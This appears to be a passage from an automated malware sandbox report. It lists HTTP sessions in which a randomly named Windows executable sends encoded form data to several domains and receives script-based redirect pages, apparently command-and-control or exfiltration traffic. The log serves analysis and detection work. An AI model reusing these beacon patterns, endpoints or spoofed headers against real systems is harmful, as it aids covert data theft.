                                                                                                                                              59192.168.11.204978913.248.169.48804180C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              Oct 4, 2024 08:11:11.038558006 CEST830OUTPOST /tcs6/ HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Host: www.invicta.world
                                                                                                                                              Origin: http://www.invicta.world
                                                                                                                                              Referer: http://www.invicta.world/tcs6/
                                                                                                                                              Content-Length: 219
                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                              Connection: close
                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                                                                              Data Raw: 6f 7a 3d 5a 52 44 57 57 6e 30 49 53 59 55 59 4b 61 52 6a 6c 5a 2b 75 43 30 64 37 56 77 75 36 4e 4b 67 4b 4e 75 61 65 6e 51 74 30 44 4d 53 43 4b 73 43 6b 6c 6b 6b 4c 4b 6a 4e 36 38 64 54 6b 4e 2b 52 69 68 36 64 41 59 6b 53 4e 4a 31 42 48 62 6b 70 36 34 2b 5a 66 34 58 53 73 4d 67 55 7a 69 72 30 6b 6e 58 6e 7a 72 39 55 66 73 6c 55 31 67 64 56 6b 72 57 78 32 59 37 6c 78 68 73 77 44 68 33 4a 36 70 4f 2f 39 7a 2f 58 4f 74 7a 49 2b 62 50 37 37 41 41 37 6e 48 6a 30 2f 73 63 50 63 68 70 37 34 65 2f 65 4e 63 49 37 78 31 35 31 79 70 51 45 4b 4d 2f 38 73 66 68 47 70 36 53 33 36 2b 30 69 4b 78 73 69 77 61 6e 37 2f 6b 69 50 63 62 2b 44 33 37 63 4e 37 51 66 73 3d
                                                                                                                                              Data Ascii: oz=ZRDWWn0ISYUYKaRjlZ+uC0d7Vwu6NKgKNuaenQt0DMSCKsCklkkLKjN68dTkN+Rih6dAYkSNJ1BHbkp64+Zf4XSsMgUzir0knXnzr9UfslU1gdVkrWx2Y7lxhswDh3J6pO/9z/XOtzI+bP77AA7nHj0/scPchp74e/eNcI7x151ypQEKM/8sfhGp6S36+0iKxsiwan7/kiPcb+D37cN7Qfs=


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              60192.168.11.204979013.248.169.48804180C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              Oct 4, 2024 08:11:13.681725025 CEST2578OUTPOST /tcs6/ HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Host: www.invicta.world
                                                                                                                                              Origin: http://www.invicta.world
                                                                                                                                              Referer: http://www.invicta.world/tcs6/
                                                                                                                                              Content-Length: 7367
                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                              Connection: close
                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                                                                              Data Raw: 6f 7a 3d 5a 52 44 57 57 6e 30 49 53 59 55 59 4b 61 52 6a 6c 5a 2b 75 43 30 64 37 56 77 75 36 4e 4b 67 4b 4e 75 61 65 6e 51 74 30 44 4d 4b 43 4b 65 4b 6b 6a 44 51 4c 4c 6a 4e 36 79 39 54 68 4e 2b 52 61 68 36 6c 45 59 6b 57 37 4a 33 4a 48 61 47 52 36 74 38 78 66 78 58 53 73 46 41 55 32 39 62 31 2b 6e 58 33 33 72 2b 73 66 73 6c 55 31 67 62 52 6b 75 79 74 32 61 37 6c 2b 72 4d 77 50 6c 33 4a 53 70 50 61 4b 7a 2b 58 77 74 44 6f 2b 62 76 72 37 47 69 54 6e 50 6a 30 35 76 63 4f 62 68 6f 47 36 65 2b 33 30 63 49 6d 6d 31 36 46 79 71 47 6c 78 49 4c 49 4f 64 53 43 6c 31 52 48 4b 32 58 37 5a 79 50 37 4c 4c 57 66 2f 75 57 44 75 62 38 4c 46 2b 4d 35 6b 4a 66 53 36 71 45 59 38 45 61 6e 30 58 66 73 77 69 7a 65 73 52 64 54 55 36 4d 59 6e 4d 6e 36 51 38 63 61 63 33 65 51 59 54 6d 78 57 47 6e 64 6f 6f 46 32 34 4a 62 77 2f 4e 72 7a 51 6e 67 72 74 55 55 57 61 56 75 65 51 6e 38 74 34 35 65 38 55 65 4c 38 72 7a 39 70 55 77 4c 51 7a 4d 55 4c 4b 4a 34 6c 76 52 67 4b 58 31 63 48 2b 55 64 4e 43 58 77 36 65 75 33 51 69 47 41 71 [TRUNCATED]
                                                                                                                                              Data Ascii: oz=ZRDWWn0ISYUYKaRjlZ+uC0d7Vwu6NKgKNuaenQt0DMKCKeKkjDQLLjN6y9ThN+Rah6lEYkW7J3JHaGR6t8xfxXSsFAU29b1+nX33r+sfslU1gbRkuyt2a7l+rMwPl3JSpPaKz+XwtDo+bvr7GiTnPj05vcObhoG6e+30cImm16FyqGlxILIOdSCl1RHK2X7ZyP7LLWf/uWDub8LF+M5kJfS6qEY8Ean0XfswizesRdTU6MYnMn6Q8cac3eQYTmxWGndooF24Jbw/NrzQngrtUUWaVueQn8t45e8UeL8rz9pUwLQzMULKJ4lvRgKX1cH+UdNCXw6eu3QiGAquazuC98MrBy1VHbVHkM7ulofYY251dbT6iygXqBeYQCqxnPotM1c8CwJbWSWv2ihn31C2ZOwiv8xL0yQ5YqwfDBJUA57ItDEjqmusA2Pur4cTV0JyXIT/D9LNZcCmlCEUJliehmmtkeixWiFs+zAiOs7MVI4FsVwIRdUF/nFtm9xuHe3iFk1Zkywm3AM4V9wvoOfHPKRvgQbOfClHNjh5pAmqL316oYMjKoO6heyUOu/st3E1HWFxTh5XfOHMnXVFr8Y4gh5pmsC8XtyoNBlViHX02hMVRY3olu2oAFLzlC7krCFABnHVUVfLxB3B99xnwYVxNjKrtz5cj/GYKzsfRz2fEmdKKEzwWpYLkL0S68KfA1wwUj4lkCrAoWn5aBtbF5GzQpqLVg4OgM/OcQhZ37SMkFmuOSydHdDcWemM8BjAOurMG3OVO0UrZGGjMY8vUM/ZXtohv6jZcifQW1dTh19KTQ0n03svlzKNEzhF2k71lSJajhGFCt1rL6yf7+X7aPj7upe+sUFwz2wfcVnCv3uU8DYWsKClUXzBFJoUTWmkJ9fcdyyZEkN6JLF1/DX5qjZb9bHBUCaGZJelQbtylC8PmjKjQPRAV6QWKVf1ixiT4zT0+Q9GOifLyteoSJ8tT8tG4vYhKMKoyTqZEDaf6RvDeaNBxsYSz [TRUNCATED]
                                                                                                                                              Oct 4, 2024 08:11:13.681761026 CEST3867OUTData Raw: 4a 55 4b 64 67 35 58 4d 47 55 71 41 6c 65 53 66 56 79 63 66 6d 7a 67 6e 51 72 35 36 6a 6c 34 35 51 33 34 43 4b 56 38 5a 35 35 6c 39 54 66 77 51 79 65 2b 68 7a 6c 30 48 34 6c 56 2b 45 4a 46 58 72 39 7a 32 52 74 36 73 4b 74 58 70 70 37 4f 76 37 70
                                                                                                                                              Data Ascii: JUKdg5XMGUqAleSfVycfmzgnQr56jl45Q34CKV8Z55l9TfwQye+hzl0H4lV+EJFXr9z2Rt6sKtXpp7Ov7pJosTS5rUKm7zh+B9iCgWvlWLhX9K8do9To8IU+kUqpU2oUmtBSjJwj94xLTkSj1EshPG34gENb5H+yZRCMu/KQTKWtVAIc2zmTfZ1Xepdw4RU3GSRCrc+y0ylmkvJg6T1h+YlhBJvqp1OdstjyipF8GrCjnImIDFl
                                                                                                                                              Oct 4, 2024 08:11:13.681834936 CEST1534OUTData Raw: 42 66 75 48 75 69 56 69 64 6a 53 44 74 69 67 47 42 67 50 32 64 70 51 62 43 62 45 75 65 73 57 62 35 63 33 49 6c 55 30 71 30 56 62 45 53 69 55 2b 7a 6d 53 51 51 4d 7a 66 52 2b 47 62 49 78 79 77 75 71 2f 63 36 76 62 32 56 38 75 51 55 39 65 75 2f 4e
                                                                                                                                              Data Ascii: BfuHuiVidjSDtigGBgP2dpQbCbEuesWb5c3IlU0q0VbESiU+zmSQQMzfR+GbIxywuq/c6vb2V8uQU9eu/NBJKLq8qjd1aIBuS3VUKB7V9UY+i4wTZiO/5+StyBtK4Opm3fJc87wkzC/siBBk2Zi/mUUXZt4y+AtMjya7+mnykcJoPkJG5z4P6m4dfYtfcV4g0wMI9Q8EyksU99rhGWYDUUJynzWS6GOmprk91+pWOkPdkuo42rE


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              61192.168.11.204979113.248.169.48804180C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              Oct 4, 2024 08:11:16.318273067 CEST548OUTGET /tcs6/?oz=UTr2VQMVaNknAPhv8pO5HUt/aSD/OuAvYfufonxWcuzqKYzjt00ESHNOp8OZd4NYpPhYAhKEfFByAl9/w+FcumGXOFp58MMDhVPqk9564kxN8Oc8kW08N+s=&UJ9=qN-llTKPHxntPrv0 HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Host: www.invicta.world
                                                                                                                                              Connection: close
                                                                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                                                                              Oct 4, 2024 08:11:16.420979023 CEST399INHTTP/1.1 200 OK
                                                                                                                                              Server: openresty
                                                                                                                                              Date: Fri, 04 Oct 2024 06:11:16 GMT
                                                                                                                                              Content-Type: text/html
                                                                                                                                              Content-Length: 259
                                                                                                                                              Connection: close
                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 6f 7a 3d 55 54 72 32 56 51 4d 56 61 4e 6b 6e 41 50 68 76 38 70 4f 35 48 55 74 2f 61 53 44 2f 4f 75 41 76 59 66 75 66 6f 6e 78 57 63 75 7a 71 4b 59 7a 6a 74 30 30 45 53 48 4e 4f 70 38 4f 5a 64 34 4e 59 70 50 68 59 41 68 4b 45 66 46 42 79 41 6c 39 2f 77 2b 46 63 75 6d 47 58 4f 46 70 35 38 4d 4d 44 68 56 50 71 6b 39 35 36 34 6b 78 4e 38 4f 63 38 6b 57 30 38 4e 2b 73 3d 26 55 4a 39 3d 71 4e 2d 6c 6c 54 4b 50 48 78 6e 74 50 72 76 30 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?oz=UTr2VQMVaNknAPhv8pO5HUt/aSD/OuAvYfufonxWcuzqKYzjt00ESHNOp8OZd4NYpPhYAhKEfFByAl9/w+FcumGXOFp58MMDhVPqk9564kxN8Oc8kW08N+s=&UJ9=qN-llTKPHxntPrv0"}</script></head></html>


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              62192.168.11.20497923.33.130.190804180C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              Oct 4, 2024 08:11:21.535525084 CEST831OUTPOST /bqye/ HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Host: www.whats-in-the-box.org
                                                                                                                                              Origin: http://www.whats-in-the-box.org
                                                                                                                                              Referer: http://www.whats-in-the-box.org/bqye/
                                                                                                                                              Content-Length: 199
                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                              Connection: close
                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                                                                              Data Raw: 6f 7a 3d 6c 70 70 32 47 39 77 5a 4a 51 53 30 4d 6c 47 52 73 57 6e 56 74 53 54 63 32 4f 6f 75 6a 4a 64 50 73 38 74 7a 34 4c 55 47 55 70 38 35 6f 49 55 7a 7a 4a 50 63 39 55 74 45 35 62 38 6c 50 75 44 38 6f 31 37 51 74 59 6c 45 2b 2b 57 6a 77 4b 50 52 69 55 66 45 71 75 6f 31 38 63 45 67 55 31 56 39 32 6b 58 78 75 31 47 54 4f 57 6c 39 32 4a 36 4c 31 50 57 54 4e 75 42 59 6e 37 43 46 2f 6d 4b 2b 65 37 4f 44 69 74 51 5a 52 79 72 55 62 75 70 41 54 43 76 51 55 56 58 78 4f 79 67 69 57 57 6f 61 54 68 34 4c 6c 77 53 6a 70 35 4f 5a 50 45 7a 46 4a 34 49 49 6d 72 68 70 77 4a 4f 66 48 59 50 30 63 77 3d 3d
                                                                                                                                              Data Ascii: oz=lpp2G9wZJQS0MlGRsWnVtSTc2OoujJdPs8tz4LUGUp85oIUzzJPc9UtE5b8lPuD8o17QtYlE++WjwKPRiUfEquo18cEgU1V92kXxu1GTOWl92J6L1PWTNuBYn7CF/mK+e7ODitQZRyrUbupATCvQUVXxOygiWWoaTh4LlwSjp5OZPEzFJ4IImrhpwJOfHYP0cw==


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              63192.168.11.20497933.33.130.190804180C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              Oct 4, 2024 08:11:24.175199986 CEST851OUTPOST /bqye/ HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Host: www.whats-in-the-box.org
                                                                                                                                              Origin: http://www.whats-in-the-box.org
                                                                                                                                              Referer: http://www.whats-in-the-box.org/bqye/
                                                                                                                                              Content-Length: 219
                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                              Connection: close
                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                                                                              Data Raw: 6f 7a 3d 6c 70 70 32 47 39 77 5a 4a 51 53 30 4e 47 65 52 70 31 66 56 72 79 54 66 7a 4f 6f 75 71 70 64 4c 73 38 68 7a 34 4b 52 44 55 37 49 35 6d 4e 6f 7a 79 49 50 63 78 30 74 45 33 37 38 67 4c 75 44 6e 6f 31 6d 76 74 59 4a 45 2b 2b 43 6a 77 4c 2f 52 6c 6c 66 44 72 2b 6f 72 30 38 45 69 62 56 56 39 32 6b 58 78 75 78 72 2b 4f 57 39 39 32 5a 6d 4c 31 75 57 55 54 2b 42 62 7a 72 43 46 75 32 4c 33 65 37 4f 6c 69 6f 49 2f 52 77 6a 55 62 73 78 41 53 54 76 54 42 6c 58 33 4b 79 67 31 5a 58 31 55 66 46 4e 36 6c 44 76 77 6a 4d 32 74 44 79 69 66 55 4b 38 73 6c 34 39 62 30 35 33 33 46 61 4f 76 42 2b 4c 69 62 47 41 62 30 52 52 4d 32 65 51 58 55 67 4e 6b 4d 76 34 3d
                                                                                                                                              Data Ascii: oz=lpp2G9wZJQS0NGeRp1fVryTfzOouqpdLs8hz4KRDU7I5mNozyIPcx0tE378gLuDno1mvtYJE++CjwL/RllfDr+or08EibVV92kXxuxr+OW992ZmL1uWUT+BbzrCFu2L3e7OlioI/RwjUbsxASTvTBlX3Kyg1ZX1UfFN6lDvwjM2tDyifUK8sl49b0533FaOvB+LibGAb0RRM2eQXUgNkMv4=


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              64192.168.11.20497943.33.130.190804180C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              Oct 4, 2024 08:11:26.815181017 CEST1289OUTPOST /bqye/ HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Host: www.whats-in-the-box.org
                                                                                                                                              Origin: http://www.whats-in-the-box.org
                                                                                                                                              Referer: http://www.whats-in-the-box.org/bqye/
                                                                                                                                              Content-Length: 7367
                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                              Connection: close
                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                                                                              Data Raw: 6f 7a 3d 6c 70 70 32 47 39 77 5a 4a 51 53 30 4e 47 65 52 70 31 66 56 72 79 54 66 7a 4f 6f 75 71 70 64 4c 73 38 68 7a 34 4b 52 44 55 37 77 35 6d 2f 77 7a 30 72 58 63 77 30 74 45 2f 62 38 68 4c 75 44 6d 6f 31 2f 6d 74 59 55 7a 2b 38 36 6a 78 6f 6e 52 6b 52 7a 44 6c 2b 6f 72 32 38 45 6e 55 31 55 35 32 6b 48 39 75 31 4c 2b 4f 57 39 39 32 59 57 4c 69 76 57 55 52 2b 42 59 6e 37 43 42 2f 6d 4c 66 65 2f 62 51 69 6f 38 4a 45 51 44 55 61 4d 68 41 65 42 33 54 64 31 58 31 48 53 68 77 5a 58 35 66 66 45 6b 4c 6c 43 61 74 6a 4c 71 74 41 48 44 2f 4d 70 63 57 7a 36 46 46 78 4d 66 34 4f 73 4b 66 42 75 72 63 62 58 59 6f 34 68 31 67 6f 4e 64 44 45 6c 42 54 50 6f 74 4e 6b 6f 75 4c 52 6a 4a 78 36 70 67 44 62 36 72 74 67 58 2f 2f 2f 34 6f 34 53 37 6a 30 62 31 75 78 4e 78 61 50 6d 6b 6e 58 77 73 39 4f 50 64 65 4a 50 62 51 30 67 45 41 63 74 39 77 74 70 6e 6f 42 73 6c 57 67 71 7a 79 49 70 45 55 36 51 34 69 4b 33 6f 6a 38 65 44 63 51 59 6c 56 32 62 38 37 46 67 63 57 77 6e 31 31 35 50 6c 4b 6e 58 71 74 63 6b 64 73 70 6b 67 57 [TRUNCATED]
                                                                                                                                              Data Ascii: oz=lpp2G9wZJQS0NGeRp1fVryTfzOouqpdLs8hz4KRDU7w5m/wz0rXcw0tE/b8hLuDmo1/mtYUz+86jxonRkRzDl+or28EnU1U52kH9u1L+OW992YWLivWUR+BYn7CB/mLfe/bQio8JEQDUaMhAeB3Td1X1HShwZX5ffEkLlCatjLqtAHD/MpcWz6FFxMf4OsKfBurcbXYo4h1goNdDElBTPotNkouLRjJx6pgDb6rtgX///4o4S7j0b1uxNxaPmknXws9OPdeJPbQ0gEAct9wtpnoBslWgqzyIpEU6Q4iK3oj8eDcQYlV2b87FgcWwn115PlKnXqtckdspkgWaYtpNZxGrItuVWT9U0lS2bJDCyxnFIawQymokwNRjZg7AoHZwhBaIypjKqDJKioopZfKPRCidH4chjWmHpNlO3VAvdBJw4G8fY02vTE6LIj8HYvfewthROU3O06S/pyoi3LC7VW3istNYabDT8UPkxsAgMZSY7wy56LCNsDBRXAE+ceAJ8zdLCDzI+H8XMvukChrocE09oJQI9IYc32LXb2EC+hm0I4p1rEQ1esYbZ8xOavW/9SCEoWzba5Fx+0lWtfOQAeXTTD99lCFcB6jo4oZlgrUqR/AwNzqfVAv9t8R0KiHbPVTBNYfTSocBP
                                                                                                                                              Oct 4, 2024 08:11:26.815258026 CEST3867OUTData Raw: 39 37 6c 45 79 38 6a 46 4f 45 61 32 53 55 71 55 4a 6b 37 6b 33 63 63 39 58 62 77 6a 55 42 2f 7a 55 6f 67 4d 59 2b 51 6c 56 5a 6e 62 6f 2f 56 55 51 50 72 79 46 32 48 77 69 69 30 77 4e 32 55 49 34 2f 64 51 68 6d 4d 6c 46 77 6d 6e 41 2f 6e 64 66 46
                                                                                                                                              Data Ascii: 97lEy8jFOEa2SUqUJk7k3cc9XbwjUB/zUogMY+QlVZnbo/VUQPryF2Hwii0wN2UI4/dQhmMlFwmnA/ndfFgnz4L+Ddl4aNaAkOoVQ+Cj/LL+Cgz78fUHc9xjzjwrxikx7672XlS6EKj9vLCWAdLVIHgA8Pm9EQimEQ4aFHwzHmrJVEfj8qrVVtJVyHUFx9NCO48hlFec51qBrFBstZwcDaOczsja2su+YSidREVp5ic3Gz4wFSU
                                                                                                                                              Oct 4, 2024 08:11:26.815279961 CEST2844OUTData Raw: 37 4a 4d 50 33 43 36 56 41 6f 6b 75 50 69 54 69 42 7a 70 57 77 72 43 7a 36 56 36 43 4b 61 63 75 75 50 4d 66 39 79 56 54 4d 5a 4f 67 69 74 73 4e 4d 4a 6b 54 34 5a 39 71 65 70 70 5a 4c 67 43 63 6c 53 38 48 43 62 55 74 7a 59 31 2b 4e 50 70 34 38 63
                                                                                                                                              Data Ascii: 7JMP3C6VAokuPiTiBzpWwrCz6V6CKacuuPMf9yVTMZOgitsNMJkT4Z9qeppZLgCclS8HCbUtzY1+NPp48cyuGmE27/Vgnb8yoiJnAtKBUX0XwM2dRun7SlNWgtfp4BSNrECmMulH7ud0it8z99NpMjfBmy5m110rwVp5ddfeeBcIeej0vvHlt3u5/OxdjqMAH0aSgw6mPt7WGbslufEWxKWAGvq2ZWu8wUFajM0ABsJQ+Y/8VSd


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              65192.168.11.20497953.33.130.190804180C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              Oct 4, 2024 08:11:29.455898046 CEST555OUTGET /bqye/?UJ9=qN-llTKPHxntPrv0&oz=orBWFM4TMH6bEQWb0mufnyz8+/9zteVW//lS5P1UVpZ6i4UA1urKkBRolapSd+D0qVvV/pdb4OKcqrb8qmiU7f8Sw/VtSC1B9WeqmjWWYlIhrofH/7u6E+o= HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Host: www.whats-in-the-box.org
                                                                                                                                              Connection: close
                                                                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                                                                              Oct 4, 2024 08:11:29.558336020 CEST399INHTTP/1.1 200 OK
                                                                                                                                              Server: openresty
                                                                                                                                              Date: Fri, 04 Oct 2024 06:11:29 GMT
                                                                                                                                              Content-Type: text/html
                                                                                                                                              Content-Length: 259
                                                                                                                                              Connection: close
                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 55 4a 39 3d 71 4e 2d 6c 6c 54 4b 50 48 78 6e 74 50 72 76 30 26 6f 7a 3d 6f 72 42 57 46 4d 34 54 4d 48 36 62 45 51 57 62 30 6d 75 66 6e 79 7a 38 2b 2f 39 7a 74 65 56 57 2f 2f 6c 53 35 50 31 55 56 70 5a 36 69 34 55 41 31 75 72 4b 6b 42 52 6f 6c 61 70 53 64 2b 44 30 71 56 76 56 2f 70 64 62 34 4f 4b 63 71 72 62 38 71 6d 69 55 37 66 38 53 77 2f 56 74 53 43 31 42 39 57 65 71 6d 6a 57 57 59 6c 49 68 72 6f 66 48 2f 37 75 36 45 2b 6f 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?UJ9=qN-llTKPHxntPrv0&oz=orBWFM4TMH6bEQWb0mufnyz8+/9zteVW//lS5P1UVpZ6i4UA1urKkBRolapSd+D0qVvV/pdb4OKcqrb8qmiU7f8Sw/VtSC1B9WeqmjWWYlIhrofH/7u6E+o="}</script></head></html>


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              66192.168.11.20497963.33.130.190804180C:\Program Files (x86)\kUElknWCQHwZDDBDxjReSnTLGbGdtYHqVIYgQZTNocqCAYERZaDnyieGgFyYuiVENLoBecH\ijDRAEBvXKu.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              Oct 4, 2024 08:11:34.675734043 CEST813OUTPOST /was5/ HTTP/1.1
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Host: www.linkwave.cloud
                                                                                                                                              Origin: http://www.linkwave.cloud
                                                                                                                                              Referer: http://www.linkwave.cloud/was5/
                                                                                                                                              Content-Length: 199
                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                              Connection: close
                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                                                                              Data Raw: 6f 7a 3d 2f 2b 6b 48 41 43 61 36 58 44 48 61 6c 65 36 42 72 79 31 32 49 49 7a 76 78 62 54 6d 6b 6d 30 2b 49 54 30 42 30 67 6f 64 66 4e 72 4c 53 31 64 45 77 48 43 74 32 30 30 41 57 68 45 76 55 76 44 67 49 56 48 66 66 45 6b 7a 34 4a 64 73 30 34 39 7a 45 71 54 33 52 51 53 66 6d 78 2b 4f 49 55 6e 76 6a 6f 61 74 4d 52 62 38 62 41 33 6d 59 4f 6c 33 45 6b 51 6f 6e 45 51 67 63 37 52 32 46 78 2b 6f 38 43 53 68 43 6c 6b 56 63 2f 30 57 61 58 31 6b 6e 7a 73 30 39 63 55 6c 6a 72 6c 4e 78 39 58 52 2f 53 6f 62 56 45 38 6e 44 76 36 73 41 33 33 50 30 68 49 61 64 43 69 4e 57 53 42 79 71 38 52 43 55 67 3d 3d
                                                                                                                                              Data Ascii: oz=/+kHACa6XDHale6Bry12IIzvxbTmkm0+IT0B0godfNrLS1dEwHCt200AWhEvUvDgIVHffEkz4Jds049zEqT3RQSfmx+OIUnvjoatMRb8bA3mYOl3EkQonEQgc7R2Fx+o8CShClkVc/0WaX1knzs09cUljrlNx9XR/SobVE8nDv6sA33P0hIadCiNWSByq8RCUg==


